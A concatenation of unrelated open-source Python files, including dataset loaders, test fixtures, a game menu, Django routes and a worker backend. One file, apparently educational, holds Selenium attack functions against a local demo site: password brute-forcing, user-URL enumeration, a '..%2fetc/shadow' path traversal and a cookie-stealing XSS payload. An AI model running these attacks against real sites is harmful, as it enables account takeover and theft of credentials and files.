This script is used to make a standard healpixel database in the
`opsimsummary/example_data` repository. This database is a coarse grained
NSIDE = 128 healpixelized OpSim created from enigma_1189_micro.db and is used for
testing purposes.
NOTE: To make this database, it is important to run this from the scripts
directory. The `outfile` variable must be uncommented in the first line of the
code. The `opsimsummary/example_data/healpixels_micro.db` file is meant to be a
standard and not be regenerated. In case this needs to be regenerated (for
example, if it is discovered that this file is incorrect), setup.py must
be run again to include the new file in the package directories for the tests to
pass.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
import time
import sqlite3
import healpy as hp
from healpy import query_disc, query_polygon
import opsimsummary as oss
import pandas as pd
from itertools import repeat
import os
from sqlalchemy import create_engine
import gzip
import shutil
# outfile = os.path.join('../opsimsummary/example_data', 'healpixels_micro.db')
t_begin = time.time()
print('Time beginning {}'.format(t_begin))
# If the output file already exists, raise ValueError
if os.path.exists(outfile):
raise ValueError('output file already exists. If you want to overwrite, '
'rerun script after doing \n\nrm {}'\
.format(os.path.abspath(outfile)))
# database path that can always be found from the package
pkgDir = os.path.split(oss.__file__)[0]
dbname = os.path.join(pkgDir, 'example_data', 'enigma_1189_micro.db')
# Create the healpixelizedOpSim
NSIDE = 128
ho = oss.HealPixelizedOpSim.fromOpSimDB(opSimDBpath=dbname, subset='combined',
propIDs=None, NSIDE=NSIDE,
raCol='ditheredRA',
decCol='ditheredDec',
vecColName='vec',
fieldRadius=1.75)
twriteStart = time.time()
print('Time {} at starting the write to disk'.format(twriteStart))
# Write to disk
ho.writeToDB(outfile, verbose=True)
tendWriteDisk = time.time()
print('Time {} at ending the write to disk'.format(tendWriteDisk))
# gzip it
with open(outfile, 'rb') as f_in, gzip.open(outfile + '.gz', 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
tzipdone = time.time()
print('Time {} at ending the zip'.format(tzipdone))
# engineFile = 'sqlite:///' + dbname
# engine = create_engine(engineFile)
# opsim_hdf = '/Users/rbiswas/data/LSST/OpSimData/minion_1016.hdf'
# OpSim_combined = pd.read_sql_query('SELECT * FROM Summary WHERE PropID is 364',
# con=engine, index_col='obsHistID')
|
rbiswas4/simlib
|
scripts/make_healpixdb.py
|
Python
|
mit
| 2,819
|
from haystack import indexes
from .models import Lecture
class LectureIndex(indexes.SearchIndex, indexes.Indexable):
university = indexes.CharField(model_attr='university')
department = indexes.CharField(model_attr='department')
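    # Note: Haystack allows exactly one field with document=True; by default
    # it must be named 'text' unless HAYSTACK_DOCUMENT_FIELD is overridden
    # in settings, so naming it 'name' here relies on that setting.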
name = indexes.CharField(document=True, use_template=True)
year = indexes.IntegerField(model_attr='year')
def get_model(self):
return Lecture
def index_queryset(self, using=None):
return self.get_model().objects.all()
|
thebenwaters/openclickio
|
core/index.py
|
Python
|
mit
| 460
|
# coding: utf-8
"""
Example of a « echo » websocket server by using `tornado_websocket.WebSocket`.
"""
|
Dturati/projetoUFMT
|
estagio/estagio/base/websocket/echo.py
|
Python
|
mit
| 111
|
import os
from squadron.fileio.symlink import force_create_symlink
def compare_contents(one, two):
with open(one) as f1:
with open(two) as f2:
return f1.read() == f2.read()
def test_symlink(tmpdir):
tmpdir = str(tmpdir)
source1 = os.path.join(tmpdir, 'source1')
with open(source1, 'w') as f:
f.write('source1\n')
dest = os.path.join(tmpdir, 'dest')
force_create_symlink(source1, dest)
assert os.path.islink(dest)
assert compare_contents(source1, dest)
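    # Re-pointing dest at a new source should replace the existing symlink: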
source2 = os.path.join(tmpdir, 'source2')
with open(source2, 'w') as f:
f.write('source2\n')
force_create_symlink(source2, dest)
assert os.path.islink(dest)
assert compare_contents(source2, dest)
|
gosquadron/squadron
|
squadron/fileio/tests/test_symlink.py
|
Python
|
mit
| 745
|
# -*- coding: utf-8 -*-
import os
import sys
import json
import time
import pytest
from errno import EEXIST
from shutil import rmtree
from tempfile import mkdtemp
from gevent import socket
from httplib import HTTPConnection
from urllib2 import build_opener, AbstractHTTPHandler
from gevent.subprocess import Popen, check_call
SRC_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', '..'))
SRC_COPPER_NODE = os.path.join(SRC_ROOT, 'cmd/copper-node')
check_call(['go', 'install'], shell=False, cwd=SRC_COPPER_NODE)
@pytest.yield_fixture
def workdir():
path = mkdtemp()
try:
yield path
finally:
rmtree(path, True)
@pytest.yield_fixture
def copper_node(workdir):
logpath = os.path.join(workdir, 'copper.log')
unixpath = os.path.join(workdir, 'copper.sock')
httppath = os.path.join(workdir, 'copper.http')
confpath = os.path.join(workdir, 'copper.conf')
config = {
"listen": [
{
"net": "unix",
"type": "http",
"addr": httppath,
},
{
"net": "unix",
"addr": unixpath,
"allow-changes": True,
},
],
}
with open(confpath, 'w') as f:
# YAML parses valid JSON data
json.dump(config, f)
with open(logpath, 'wb') as logfile:
p = Popen(['copper-node', '-config=' + confpath], shell=False, cwd=workdir, stdout=logfile, stderr=logfile)
try:
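            # Busy-wait for the unix socket to appear; if copper-node dies
            # before creating it, dump its log and fail fast.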
while not os.path.exists(unixpath):
time.sleep(0.001)
rc = p.poll()
if rc is not None:
with open(logpath, 'rb') as logfile:
sys.stderr.write(logfile.read())
raise RuntimeError('copper-node exited with status %r' % (rc,))
yield {
'unix': unixpath,
'http': httppath,
}
finally:
if p.poll() is None:
p.terminate()
p.wait()
@pytest.yield_fixture
def copper_client(copper_node):
from copper.client import Client
with Client(('unix', copper_node['unix'])) as client:
yield client
class CopperHTTPConnection(HTTPConnection):
def connect(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
timeout = self.timeout
if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
sock.connect(self.host)
except:
sock.close()
raise
self.sock = sock
class CopperHTTPHandler(AbstractHTTPHandler):
def __init__(self, default_path):
AbstractHTTPHandler.__init__(self)
self.default_path = default_path
def copper_open(self, req):
return self.do_open(CopperHTTPConnection, req)
def copper_request(self, req):
host = req.get_host()
if not host:
req.host = self.default_path
# Go 1.7+ does not support malformed Host header
if not req.has_header('Host'):
req.add_unredirected_header('Host', 'copper')
return self.do_request_(req)
def copper_response(self, req, res):
return res
@pytest.fixture
def copper_http_client(copper_node):
return build_opener(CopperHTTPHandler(copper_node['http']))
|
snaury/copper
|
contrib/python-copper/t/conftest.py
|
Python
|
mit
| 3,321
|
import pygame as pg
import os
from Data.spritesheet_functions import SpriteSheet
from Data.images import *
from Data.level_classes import *
from Data.player_related import *
import Data.eztext
pg.init()
class Menu():
font_name = pg.font.SysFont('Terminal', 22, True, False)
txtbx = Data.eztext.Input(maxlength=10, color=(0, 0, 0), prompt='Name: ')
txtbx.set_pos(330, 436)
txtbx.set_font(font_name)
def __init__(self, background):
self.rightclicked = 0
self.background = background
self.position = 0
self.left_button = None
self.right_button = None
sprite_sheet = SpriteSheet('Resources\\main_character.png')
image = sprite_sheet.get_image(0, 635, 30, 51)
self.male = image
sprite_sheet = SpriteSheet('Resources\\main_character_female.png')
image = sprite_sheet.get_image(0, 635, 30, 51)
self.female = image
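        # NOTE: self.bill, the hidden third character blitted in draw(),
        # is never initialized here; it is presumably assigned elsewhere.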
def draw(self, surface):
self.surface = surface
self.surface.blit(IMAGES[self.background], (0, 0))
pg.draw.rect(self.surface, (255, 255, 255), (326, 430, 170, 30), 0)
self.txtbx.draw(self.surface)
self.left_button = surface.blit(IMAGES['left_orange'], (325, 383))
self.right_button = surface.blit(IMAGES['right_orange'], (465, 383))
if self.position == 0:
self.surface.blit(self.male, (398, 320))
elif self.position == 1:
self.surface.blit(self.female, (398, 320))
elif self.position == 2:
self.surface.blit(self.bill, (398, 320))
def update(self, pos):
        if self.left_button is not None:
if self.left_button.collidepoint(pos):
self.rightclicked = 0
if self.position == 0:
pass
elif self.position != 0:
self.position -= 1
elif self.right_button.collidepoint(pos):
self.rightclicked += 1
if self.rightclicked >= 50:
self.position = 2
if self.position == 1 or self.position == 2:
pass
elif self.position == 0:
self.position += 1
def update_text(self, events):
self.player_name = self.txtbx.update(events)
        if self.player_name is not None:
if self.position == 0:
self.gender = "male"
elif self.position == 1:
self.gender = "female"
elif self.position == 2:
self.gender = "bill"
return True
def char_create():
main_menu = Menu('main_menu')
done = False
    while not done:
events = pg.event.get()
for event in events:
if event.type == pg.MOUSEBUTTONDOWN:
main_menu.update(pg.mouse.get_pos())
change = main_menu.update_text(events)
if change:
done = True
main_menu.draw(screen)
pg.display.flip()
player = Player(main_menu.gender)
player.name = main_menu.player_name
player.rect.x = 1800
player.rect.y = 1800
return player
|
JamesStudd/PythonRPG
|
Data/menu.py
|
Python
|
mit
| 3,185
|
from django.conf.urls import url
from . import views_for_staff
urlpatterns = [
url(r'^$',
views_for_staff.main,
name='staff_area'),
# Categories
url(r'^categories/$',
views_for_staff.categories,
name='categories'),
url(r'^categories/(?P<category_slug>[-\w]+)/$',
views_for_staff.categories,
name='category'),
url(r'^category_create/$',
views_for_staff.category_create,
name='category_create'),
url(r'^category_update/(?P<slug>[-\w]+)/$',
views_for_staff.category_update,
name='category_update'),
# Manufacturers
url(r'^manufacturers/$',
views_for_staff.manufacturers,
name='manufacturers'),
url(r'^manufacturer_create/$',
views_for_staff.manufacturer_create,
name='manufacturer_create'),
url(r'^manufacturer_update/(?P<slug>[-\w]+)/$',
views_for_staff.manufacturer_update,
name='manufacturer_update'),
# Products
url(r'^product_create/$',
views_for_staff.product_create,
name='product_create'),
url(r'^product_update/(?P<slug>[-\w]+)/$',
views_for_staff.product_update,
name='product_update'),
]
|
samitnuk/online_shop
|
apps/shop/urls_for_staff.py
|
Python
|
mit
| 1,213
|
#!/usr/bin/env python3
import os
from setuptools import setup, find_packages
# vcs+proto://host/path@revision#egg=project-version
# this is latest upstream commit (April 2017)
# upstream maintainer of urwidtrees doesn't maintain PyPI urwidtrees
urwidtrees_source = "git+https://github.com/pazz/urwidtrees.git@9142c59d3e41421ff6230708d08b6a134e0a8eed#egg=urwidtrees-1.0.3.dev"
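# NOTE: dependency_links is no longer honored by recent pip releases, so the
# URL above may need to be installed manually (e.g. pip install git+...).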
requirements = [
"urwid",
"docker",
"urwidtrees"
]
setup(
name='sen',
version='0.6.2',
description="Terminal User Interface for Docker Engine",
author='Tomas Tomecek',
author_email='tomas@tomecek.net',
url="https://github.com/TomasTomecek/sen/",
license="MIT",
entry_points={
'console_scripts': ['sen=sen.cli:main'],
},
packages=find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]),
install_requires=requirements,
dependency_links=[urwidtrees_source],
classifiers=['Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.4',
'Topic :: System :: Monitoring',
],
)
|
TomasTomecek/sen
|
setup.py
|
Python
|
mit
| 1,539
|
import subliminal
import io
from babelfish import Language
def get_subtitle_path(video_path, video_language):
    # Swap only the trailing extension; str.replace would substitute the
    # first occurrence of the extension string anywhere in the path.
    base = video_path.rsplit(".", 1)[0]
    return base + "." + video_language.alpha3 + ".srt"
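# Example (illustrative): get_subtitle_path("Show.S01E01.mkv", Language('eng'))
# returns "Show.S01E01.eng.srt".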
def save_subtitle(video, video_subtitle, encoding=None):
subtitle_path = get_subtitle_path(video.name, video_subtitle.language)
if encoding is None:
with io.open(subtitle_path, 'wb') as f:
f.write(video_subtitle.content)
else:
with io.open(subtitle_path, 'w', encoding=encoding) as f:
f.write(video_subtitle.text)
return subtitle_path
def get_subs(episode_path, language_codes):
lang = {Language(x) for x in language_codes}
result = set()
video = subliminal.scan_video(episode_path)
if video:
if lang.issubset(video.subtitle_languages):
# already have subs
            print('Detected subtitles for "' + episode_path + '"')
for language in lang:
result.add(language.alpha3)
else:
subtitles = subliminal.download_best_subtitles({video, }, lang,
providers=['opensubtitles', 'podnapisi'])
for vid, video_subtitles in subtitles.items():
if video_subtitles:
for sub in video_subtitles:
print('Downloaded subtitles "' + save_subtitle(vid, sub) + '" for "' + episode_path + '"')
result.add(sub.language.alpha3)
return result
|
rkohser/gustaf
|
app/core/subtitlesdownloader.py
|
Python
|
mit
| 1,561
|
import urllib.request
import requests
from hashlib import md5
import json
import os
from time import gmtime, strftime
with open("config.json") as configfile:
config = json.load(configfile)
MANAGER_URL = config["MANAGER_URL"]
SECRET_FOLDER = config["SECRET_FOLDER"]
CAPABILITIES = config.get("CAPABILITIES", [])
def getTask():
"""Gets either a run or a compile task from the API"""
params = {
"capability": CAPABILITIES,
}
content = requests.get(MANAGER_URL+"task", params=params).text
print("Task call %s\n" % content)
if content == "null":
return None
else:
return json.loads(content)
def getBotHash(user_id, bot_id, is_compile=False):
"""Gets the checksum of a user's bot's zipped source code"""
params = {
"user_id": user_id,
"bot_id": bot_id
}
if is_compile:
params["compile"] = 1
result = requests.get(MANAGER_URL+"botHash", params=params)
print("Getting bot hash %s\n" % result.text)
return json.loads(result.text).get("hash")
def storeBotLocally(user_id, bot_id, storage_dir, is_compile=False):
"""
Download and store a bot's zip file locally
Checks the file's checksum to make sure the file was downloaded properly
"""
iterations = 0
while iterations < 100:
url = MANAGER_URL + "botFile?user_id={}&bot_id={}".format(user_id, bot_id)
if is_compile:
url += "&compile=1"
print("Bot file url %s\n" % url)
remote_zip = urllib.request.urlopen(url)
        # Header looks like 'attachment; filename=bot.zip' (possibly quoted)
        zip_filename = remote_zip.headers.get('Content-disposition').split("filename=")[1].strip('"')
zip_path = os.path.join(storage_dir, zip_filename)
if os.path.exists(zip_path):
os.remove(zip_path)
remote_zip_contents = remote_zip.read()
remote_zip.close()
local_zip = open(zip_path, "wb")
local_zip.write(remote_zip_contents)
local_zip.close()
content_hash = md5(remote_zip_contents).hexdigest()
remote_hash = getBotHash(user_id, bot_id, is_compile)
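        # Retry the download whenever the local checksum disagrees with the
        # manager's record (guards against truncated or corrupted transfers).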
if content_hash != remote_hash:
iterations += 1
continue
return zip_path
raise RuntimeError("Could not download bot with valid hash, aborting")
def storeBotRemotely(user_id, bot_id, zip_file_path):
"""Posts a bot file to the manager"""
    with open(zip_file_path, "rb") as f:
        zip_contents = f.read()
iterations = 0
local_hash = md5(zip_contents).hexdigest()
while iterations < 100:
r = requests.post(MANAGER_URL+"botFile",
data={
"user_id": str(user_id),
"bot_id": str(bot_id),
},
files={"bot.zip": zip_contents})
print("Posting compiled bot archive %s\n" % r.text)
# Try again if local and remote hashes differ
if local_hash != getBotHash(user_id, bot_id):
print("Hashes do not match! Redoing file upload...\n")
iterations += 1
continue
return
raise RuntimeError("Could not upload bot with valid hash, aborting")
def compileResult(user_id, bot_id, did_compile, language, errors=None):
"""Posts the result of a compilation task"""
r = requests.post(MANAGER_URL+"compile", data={
"user_id": user_id,
"bot_id": bot_id,
"did_compile": int(did_compile),
"language": language,
"errors": errors,
})
print("Posted compile result %s\n" % r.text)
def gameResult(users, game_output):
"""
POST the results of a game to the game coordinator.
:param users:
:param game_output: The parsed JSON result the game gives in quiet mode.
:return:
"""
replay_path = game_output["replay"]
print("Posting game result %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
files = {os.path.basename(replay_path): open(replay_path, "rb").read()}
for path in game_output["error_logs"].values():
files[os.path.basename(path)] = open(path, "rb").read()
data = {
"users": json.dumps(users),
"game_output": json.dumps(game_output),
}
print("Uploading game result")
print(json.dumps(users, indent=4))
print(json.dumps(game_output, indent=4))
r = requests.post(MANAGER_URL+"game", data=data, files=files)
print("Got game result %s (GMT)\n" % str(strftime("%Y-%m-%d %H:%M:%S", gmtime())))
print("\n-------Game result:-----")
print(r.text)
print("------------------------\n")
|
lanyudhy/Halite-II
|
apiserver/worker/backend.py
|
Python
|
mit
| 4,570
|
#!/usr/bin/python3
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import re
import requests
def guess_password(driver):
driver.get("http://127.0.0.1:5000/")
with open("names.txt", "r") as f:
names = f.read()
print(names)
names = names.split("\n")
print(names)
usernames = []
for name in names:
usernames.append(name.replace(" ", "."))
with open("dictionary.txt") as f:
passwords = f.read()
passwords = passwords.split("\n")
print(passwords)
for user in usernames:
for password in passwords:
print("Trying Username: {} with Password: {}".format(user, password))
elem = driver.find_element_by_name("username")
elem.send_keys(user)
time.sleep(0.11)
elem = driver.find_element_by_name("password")
elem.send_keys(password)
time.sleep(0.1)
elem.send_keys(Keys.RETURN)
time.sleep(0.1)
src = driver.page_source
login_err_found = re.search(r'Wrong username', src)
if login_err_found is None:
print("Found the password! Username: {} with Password: {}".format(user, password))
return user,password
return "Not found"
def brute_force_login(driver):
driver.get("http://127.0.0.1:5000/")
page_text = guess_password(driver)
print(page_text)
def sess_pred(driver):
run = True
base = "http://127.0.0.1:5000/"
counter = 0
users_found = []
while run is True:
try:
counter += 1
url = base + "user_data/user" + str(counter)
print("\n Trying {}".format(url))
driver.get(url)
r = requests.get(url)
print(r.status_code)
if r.status_code != 200:
run = False
else:
users_found.append(counter-1)
print(r.text)
        except Exception:
print("breaking...")
break
print(users_found)
return users_found
def directory_traversal(driver):
url = "http://127.0.0.1:5000/get_file/..%2fetc/shadow"
driver.get(url)
r = requests.get(url)
print(r.text)
return r.text
def xss_attack(driver):
driver.get("http://127.0.0.1:5000/blog")
elem = driver.find_element_by_name("post")
elem.send_keys("<script>document.write(document.cookie);</script>")
elem.send_keys(Keys.RETURN)
driver.get("http://127.0.0.1:5000/blog")
print(driver.page_source)
return driver.page_source
if __name__ == '__main__':
fireFoxOptions = webdriver.FirefoxOptions()
fireFoxOptions.headless = True
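    # NOTE: the .headless attribute is the Selenium 3 style; newer Selenium
    # releases prefer fireFoxOptions.add_argument("-headless") instead.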
driver = webdriver.Firefox(options=fireFoxOptions)
## Uncomment one of the functions below to run a specific hack
#brute_force_login(driver)
#sess_pred(driver)
    #directory_traversal(driver)
#xss_attack(driver)
driver.close()
|
shantnu/PythonForHackers
|
hack1.py
|
Python
|
mit
| 2,989
|
#!/usr/bin/env python3
#-*- encoding: utf-8 -*-
import os, sys, tempfile, unittest
import lxml.etree as etree
ECMDS_INSTALL_DIR = os.path.normpath(os.path.join(
os.path.dirname(os.path.realpath(sys.argv[0])),
"..", ".."
))
sys.path.insert(1, ECMDS_INSTALL_DIR + os.sep + 'lib')
from net.ecromedos.error import ECMDSPluginError
import net.ecromedos.plugins.strip as strip
class UTTestPluginStrip(unittest.TestCase):
def test_stripPlainTextContent(self):
content = "<root><p> This is a test. </p></root>"
root = etree.fromstring(content)
plugin = strip.getInstance({})
plugin.process(root.find("./p"), "xhtml")
plugin.flush()
tree = etree.ElementTree(element=root)
expected_result = b'<root><p>This is a test.</p></root>'
result = etree.tostring(tree)
self.assertEqual(result, expected_result)
#end function
def test_stripNestedFormattingNodes(self):
content = "<root><p> <i> <i> </i> </i> <i> X</i> This is a test. <i>X </i> <i> <i> </i> </i> </p></root>"
root = etree.fromstring(content)
plugin = strip.getInstance({})
plugin.process(root.find("./p"), "xhtml")
plugin.flush()
tree = etree.ElementTree(element=root)
expected_result = b'<root><p><i><i></i></i><i>X</i> This is a test. <i>X</i><i><i></i></i></p></root>'
result = etree.tostring(tree)
self.assertEqual(result, expected_result)
#end function
def test_stripStopAtHardNodes(self):
content = "<root><p> <idref/><i> </i> This is a test. <i> </i><counter/></p></root>"
root = etree.fromstring(content)
plugin = strip.getInstance({})
plugin.process(root.find("./p"), "xhtml")
plugin.flush()
tree = etree.ElementTree(element=root)
expected_result = b'<root><p><idref/><i> </i> This is a test. <i> </i><counter/></p></root>'
result = etree.tostring(tree)
self.assertEqual(result, expected_result)
#end function
#end class
if __name__ == "__main__":
unittest.main()
|
tobijk/ecromedos
|
test/ut/test_plugin_strip.py
|
Python
|
mit
| 2,099
|
from flask_wtf import Form
from flask_wtf.html5 import EmailField
from wtforms import StringField, PasswordField
from wtforms.validators import DataRequired
class SignUp(Form):
name = StringField('name', validators=[DataRequired()])
email = EmailField('email', validators=[DataRequired()])
password = PasswordField('password', validators=[DataRequired()])
|
Tboan/academicforge
|
forms.py
|
Python
|
mit
| 368
|
from . import app
from .model import github, pivotal
from flask import request, abort
import requests
import re
PIVOTAL_ACCESS_TOKEN = app.config['PIVOTAL_ACCESS_TOKEN']
GITHUB_ACCESS_TOKEN = app.config['GITHUB_ACCESS_TOKEN']
BLACKLISTED_GITHUB_ACTIONS = ('labeled', 'unlabeled')
def log_and_abort(e):
app.logger.warning('%s. Authorization: %s', e.args[0],
e.request.headers.get('Authorization', 'null'))
return abort(e.response.status_code)
def get_story_ids(title):
_re_story_ids = re.compile(r'[^#]*#(\d+)(?=[,\]\s])')
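    # Matches Pivotal story ids such as '#123' in PR titles like
    # '[#123, #456] My change'; the lookahead requires ',', ']' or
    # whitespace right after the digits.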
    return _re_story_ids.findall(title)
def pull_requests_for_story(owner, repo, story_id):
try:
pull_requests = github.pull_requests(
owner, repo, access_token=GITHUB_ACCESS_TOKEN)
except requests.HTTPError as e:
return log_and_abort(e)
for pull_request in pull_requests:
if story_id not in pull_request['title']:
continue
yield pull_request
def set_pull_request_labels(pull_request, owner, repo):
story_ids = get_story_ids(pull_request['title'])
try:
labels = (story['current_state']
for story in pivotal.stories(
story_ids, access_token=PIVOTAL_ACCESS_TOKEN))
github.set_labels(
pull_request,
owner,
repo,
labels,
access_token=GITHUB_ACCESS_TOKEN)
except requests.HTTPError as e:
return log_and_abort(e)
@app.route('/')
def index():
return ('', 200)
@app.route('/github/<string:secret_key>', methods=['POST'])
def github_hook(secret_key):
if request.json['action'] in BLACKLISTED_GITHUB_ACTIONS:
app.logger.info('Ignoring %r event from github',
request.json['action'])
return ('', 200)
owner = request.json['repository']['owner']['login']
repo = request.json['repository']['name']
pull_request_number = request.json['number']
pull_request = github.pull_request(
owner, repo, pull_request_number, access_token=GITHUB_ACCESS_TOKEN)
set_pull_request_labels(pull_request, owner, repo)
return ('', 204)
@app.route(
'/pivotal/<string:owner>/<string:repo>/<string:secret_key>', # noqa E501
methods=['POST'])
def pivotal_hook(owner, repo, secret_key):
for change in request.json['changes']:
story_id = str(change['id'])
for pull_request in pull_requests_for_story(owner, repo, story_id):
set_pull_request_labels(pull_request, owner, repo)
return ('', 204)
|
bionikspoon/pivotal-github-status
|
app/views.py
|
Python
|
mit
| 2,582
|
import os
import numpy as np
from PIL import Image
import six
import json
import cv2
from io import BytesIO
import common.paths as paths
from .datasets_base import datasets_base
class horse2zebra_train(datasets_base):
def __init__(self, dataset_path=paths.root_horse2zebra, flip=1, resize_to=172, crop_to=128):
super(horse2zebra_train, self).__init__(flip=flip, resize_to=resize_to, crop_to=crop_to)
self.dataset_path = dataset_path
self.trainAkey = self.read_image_key_file_plaintext(dataset_path + paths.horse2zebra_trainA_key)
self.trainBkey = self.read_image_key_file_plaintext(dataset_path + paths.horse2zebra_trainB_key)
def __len__(self):
return len(self.trainAkey)
def get_example(self, i):
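        # CycleGAN-style unaligned training: sample an A image and a B image
        # independently at random rather than as a fixed pair.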
idA = self.trainAkey[np.random.randint(0,len(self.trainAkey))]
idB = self.trainBkey[np.random.randint(0,len(self.trainBkey))]
imgA = cv2.imread(self.dataset_path+'trainA/'+idA, cv2.IMREAD_COLOR)
imgB = cv2.imread(self.dataset_path+'trainB/'+idB, cv2.IMREAD_COLOR)
imgA = self.do_augmentation(imgA)
imgB = self.do_augmentation(imgB)
imgA = self.preprocess_image(imgA)
imgB = self.preprocess_image(imgB)
return imgA, imgB
class horse2zebra_test(datasets_base):
def __init__(self, dataset_path=paths.root_horse2zebra, flip=1, resize_to=172, crop_to=128):
        super(horse2zebra_test, self).__init__(flip=flip, resize_to=resize_to, crop_to=crop_to)
self.dataset_path = dataset_path
self.testAkey = self.read_image_key_file_plaintext(dataset_path + paths.horse2zebra_testA_key)
self.testBkey = self.read_image_key_file_plaintext(dataset_path + paths.horse2zebra_testB_key)
def __len__(self):
return len(self.testAkey)
def get_example(self, i):
idA = self.testAkey[i]
idB = self.testBkey[i]
imgA = cv2.imread(self.dataset_path+'testA/'+idA, cv2.IMREAD_COLOR)
imgB = cv2.imread(self.dataset_path+'testB/'+idB, cv2.IMREAD_COLOR)
imgA = self.do_augmentation(imgA)
imgB = self.do_augmentation(imgB)
imgA = self.preprocess_image(imgA)
imgB = self.preprocess_image(imgB)
return imgA, imgB
|
Aixile/chainer-cyclegan
|
datasets/horse2zebra.py
|
Python
|
mit
| 2,254
|
# Copyright (c) 2010-2014 Bo Lin
# Copyright (c) 2010-2014 Yanhong Annie Liu
# Copyright (c) 2010-2014 Stony Brook University
# Copyright (c) 2010-2014 The Research Foundation of SUNY
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import builtins
import sys
from ast import *
from .. import common
from . import dast
from .utils import printe, printw, printd
# DistAlgo keywords
KW_PROCESS_DEF = "process"
KW_CONFIG = "config"
KW_RECV_QUERY = "received"
KW_SENT_QUERY = "sent"
KW_RECV_EVENT = "receive"
KW_SENT_EVENT = "sent"
KW_MSG_PATTERN = "msg"
KW_EVENT_SOURCE = "from_"
KW_EVENT_DESTINATION = "dst"
KW_EVENT_TIMESTAMP = "clk"
KW_EVENT_LABEL = "at"
KW_DECORATOR_LABEL = "labels"
KW_EXISTENTIAL_QUANT = "some"
KW_UNIVERSAL_QUANT = "each"
KW_AGGREGATE_SIZE = "lenof"
KW_AGGREGATE_MIN = "minof"
KW_AGGREGATE_MAX = "maxof"
KW_AGGREGATE_SUM = "sumof"
KW_COMP_SET = "setof"
KW_COMP_TUPLE = "tupleof"
KW_COMP_LIST = "listof"
KW_COMP_DICT = "dictof"
KW_AWAIT = "await"
KW_AWAIT_TIMEOUT = "timeout"
KW_SEND = "send"
KW_SEND_TO = "to"
KW_BROADCAST = "bcast"
KW_PRINT = "output"
KW_SELF = "self"
KW_TRUE = "True"
KW_FALSE = "False"
KW_NULL = "None"
KW_SUCH_THAT = "has"
KW_RESET = "reset"
def is_setup_func(node):
"""Returns True if this node defines a function named 'setup'."""
return (isinstance(node, FunctionDef) and
node.name == "setup")
def extract_label(node):
"""Returns the label name specified in 'node', or None if 'node' is not a
label.
"""
if (isinstance(node, UnaryOp) and
isinstance(node.op, USub) and
isinstance(node.operand, UnaryOp) and
isinstance(node.operand.op, USub) and
isinstance(node.operand.operand, Name)):
return node.operand.operand.id
else:
return None
##########
# Operator mappings:
##########
NegatedOperators = {
NotEq : dast.EqOp,
IsNot : dast.IsOp,
NotIn : dast.InOp
}
OperatorMap = {
Add : dast.AddOp,
Sub : dast.SubOp,
Mult : dast.MultOp,
Div : dast.DivOp,
Mod : dast.ModOp,
Pow : dast.PowOp,
LShift : dast.LShiftOp,
RShift : dast.RShiftOp,
BitOr : dast.BitOrOp,
BitXor : dast.BitXorOp,
BitAnd : dast.BitAndOp,
FloorDiv : dast.FloorDivOp,
Eq : dast.EqOp,
NotEq: dast.NotEqOp,
Lt : dast.LtOp,
LtE : dast.LtEOp,
Gt : dast.GtOp,
GtE : dast.GtEOp,
Is : dast.IsOp,
IsNot : dast.IsNotOp,
In : dast.InOp,
NotIn : dast.NotInOp,
USub : dast.USubOp,
UAdd : dast.UAddOp,
Invert : dast.InvertOp,
And : dast.AndOp,
Or : dast.OrOp
}
# New matrix multiplication operator since 3.5:
if sys.version_info >= (3, 5):
OperatorMap[MatMult] = dast.MatMultOp
# FIXME: is there a better way than hardcoding these?
KnownUpdateMethods = {
"add", "append", "extend", "update",
"insert", "reverse", "sort",
"delete", "remove", "pop", "clear", "discard"
}
ValidResetTypes = {"Received", "Sent", ""}
ApiMethods = common.api_registry.keys()
BuiltinMethods = common.builtin_registry.keys()
PythonBuiltins = dir(builtins)
ComprehensionTypes = {KW_COMP_SET, KW_COMP_TUPLE, KW_COMP_DICT, KW_COMP_LIST}
AggregateKeywords = {KW_AGGREGATE_MAX, KW_AGGREGATE_MIN,
KW_AGGREGATE_SIZE, KW_AGGREGATE_SUM}
Quantifiers = {KW_UNIVERSAL_QUANT, KW_EXISTENTIAL_QUANT}
##########
# Exceptions:
class MalformedStatementError(Exception): pass
##########
# Name context types:
class NameContext:
def __init__(self, type=None):
self.type = type
class Assignment(NameContext): pass
class Update(NameContext): pass
class Read(NameContext): pass
class IterRead(Read): pass
class FunCall(NameContext): pass
class Delete(NameContext): pass
class AttributeLookup(NameContext): pass
class SubscriptLookup(NameContext): pass
class PatternContext(NameContext): pass
class Existential(NameContext): pass
class Universal(NameContext): pass
##########
class PatternParser(NodeVisitor):
"""Parses a pattern.
"""
def __init__(self, parser, literal=False):
self._parser = parser
if parser.current_query_scope is None:
self.namescope = dast.NameScope(parser.current_scope)
else:
self.namescope = parser.current_query_scope
self.parent_node = parser.current_parent
self.current_query = parser.current_query
self.use_object_style = parser.use_object_style
self.literal = literal
@property
def outer_scope(self):
